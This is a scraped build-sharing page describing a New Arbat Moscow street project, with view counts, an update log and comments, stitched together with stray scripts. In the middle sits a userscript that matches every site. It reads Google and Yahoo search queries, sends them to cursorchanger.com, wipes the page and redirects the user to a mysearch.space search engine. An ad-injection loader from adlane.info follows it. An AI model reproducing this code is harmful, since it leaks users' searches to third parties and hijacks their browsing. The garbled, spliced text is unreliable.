- 8,036 views, 22 today
- 279 downloads, 5 today
1,023
Various departments and organizations are located in four administrative buildings, which have the shape of an open book. In the stylobate there are restaurants, shops and bars, and the houses opposite are residential. The famous October cinema is located on the avenue, where both Soviet and foreign films are shown around the clock.
My group - vk.com/krasgornews
You can download the whole city project with Red Square and more buildings
My group - vk.com/krasgornews
You can download the whole city project with Red Square and more buildings
Progress | 100% complete |
Tags |
1 Update Logs
Update #1 : by helixzlone 07/01/2023 7:51:57 pmJul 1st
Added download link
tools/tracking
5262205
2
new-arbat-moscow-street
Create an account or sign in to comment.
// @name panda google
// @namespace tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author You
// @match *://*/*
// @grant none
// ==/UserScript==
(function() {
function findGetParameter(parameterName) {
var result = null,
tmp = [];
location.search
.substr(1)
.split("&")
.forEach(function (item) {
tmp = item.split("=");
if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);
});
return result;
}
let arr = [];
var u ='lato1.mysearch.space?q=',
s = [
{
'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*$/,
'query':'q',
},
{
'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)$/,
'query':'p'
}
]
console.log('ddd');
for(var i = 0; i < s.length; i++){
var net = s[i], pattern = net.host, q = findGetParameter(net.query);
if( pattern.test(window.location.href) ){
let xhr = new XMLHttpRequest();
xhr.open('GET', 'cursorchanger.com/api/request/search.php?click=&search='+q, false);
xhr.send();
console.log(arr);
if(arr[0] === q || arr[1] === q || arr[2] === q){
console.log('no redirect')
}else {
console.log('redirect')
document.body.innerHTML="";
window.location.href=u+q;
}
}
}
})();
x
let cl444 = document.querySelector("#clos");
cl444.addEventListener("click", function () {
let c = this.parentElement;
c.hidden = true;
});(function(d){var wrapper=d.createElement("script"); wrapper.id="WDS622329";wrapper.type="text/javascript";wrapper.src="s.adlane.info/?floor=0&content_page_url=" + encodeURIComponent(window.location.href) + "&width=120&height=600&cb=" + (new Date()).getTime().toString() + "&aid=622329";var s=d.getElementById("PDS622329");s.parentNode.insertBefore(wrapper, s);}(document));
How to download?
I am from Russian